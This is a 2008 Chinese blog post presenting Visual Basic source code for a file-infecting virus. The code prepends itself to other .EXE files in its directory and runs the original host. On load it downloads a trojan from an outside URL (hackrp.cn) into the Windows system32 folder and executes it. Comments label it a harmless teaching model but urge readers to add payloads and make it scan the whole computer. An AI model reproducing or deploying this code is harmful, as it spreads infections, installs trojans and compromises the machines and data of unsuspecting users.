loading ...
loading...

2008-07-18 | VB感染病毒源码部份代码来自网络

分享
'什么控件都不用加,直接输入以下代码就行了。
Option Explicit
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Victim As String '要感染的文件的名字
Private HostLen As Long '要感染的文件的大小
Private vbArray() As Byte '病毒的代码
Private hArray() As Byte '要感染的文件的代码
Private lenght As Long
Private MySize As Integer
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Sub form_Initialize()
Dim i As Long
On Error GoTo vbVerror '出错处理
'原理:将生成病毒文件的代码读出,粘在要被感染的文件的后面。
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _
As #1
ReDim MyArray(LOF(1) - 1)
MySize = LOF(1)
ReDim vbArray(MySize)
Get #1, 1, vbArray
Close #1
'这是在读自己的代码

Victim = Dir(App.Path & "\" & "*.EXE") '随便选一个文件(目前只是在病毒所在的目录下随机选一个,将来你可以修改,让它不断的循环搜索计算机上的所有文件。)
While Victim <> ""
If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then
Open App.Path & "\" & Victim For Binary Access Read As #1
ReDim hArray(LOF(1))
Get #1, 1, hArray
Close #1
'读出病毒自身的代码

If hArray(&H69) <> &H4D Then
i = hArray(&H3C)
If hArray(i) = &H50 Then
Open App.Path & "\" & Victim For Binary Access Write As #1
Put #1, , vbArray
Put #1, MySize, hArray
Close #1
End If '要保证被感染的不是空文件(不是圈套)
End If
End If
'读出准备被感染的文件的代码
Victim = Dir() 'Next
Wend
'下面的工作是为了保证病毒不会重复感染一个文件,也不会自我感染。
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
lenght = LOF(1) - MySize
If lenght <> 0 Then
ReDim vbArray(lenght - 1)
Get #1, MySize, vbArray
Close #1
Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1
Put #1, , vbArray
Close #1

idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill App.Path & "\" & App.EXEName & ".eve"
Else
Close #1
End If

End
vbVerror: '出错处理,空着就可以了
End Sub
Private Sub Form_Load()
URLDownloadToFile 0, "http://www.hackrp.cn/mm/hackrp.exe", "C:\WINDOWS\system32\setup.exe", 0, 0  '这儿的第一个参数是你的木马地址,可以从网站下载病毒.第二个参数大木马下载到本地的位置
Sleep 30000 '单位是毫秒,我这里是挂起30秒
ShellExecute 0, vbNullString, "C:\WINDOWS\system32\setup.exe", vbNullString, vbNullString, vbNormalFocus 'ShellExecute的第2个参数是你要运行的文件,也就是我们下到本地的木马地址了
End
End Sub
'还有其他的说明:
'1、本代码目前仅是实验模型,给新手讲解原理之用,不会失控,绝对安全。
'2、本代码仅实现了感染EXE的功能,其他的功能还须你自己加入。
'3、为了目前的安全,本病毒只是在病毒所在的目录下随机选一个文件感染,你可以利用此功能来调试;将来你可以修改,让它不断的循环搜索计算机上的所有文件。
分享 分享 |  评论 (0) |  阅读 (?)  |  固定链接 |  发表于 22:54

评论     想第一时间抢沙发么?

搜狐博客温馨提示:搜狐博客官方不会要求参加活动的各位博友缴纳任何的手续费用。请勿轻信留言、评论中的中奖信息,更不要拨打陌生电话及向陌生帐户汇款,谨防受骗!识别更多网络骗术,请 点击查看详情
您还未登录,只能匿名发表评论。或者您可以 登录 后发表。
 
  *中国人爱国心,搜狗输入法爱国主题皮肤下载>>
表  情:
加载中...
回复通知: 同时用小纸条通知对方该回复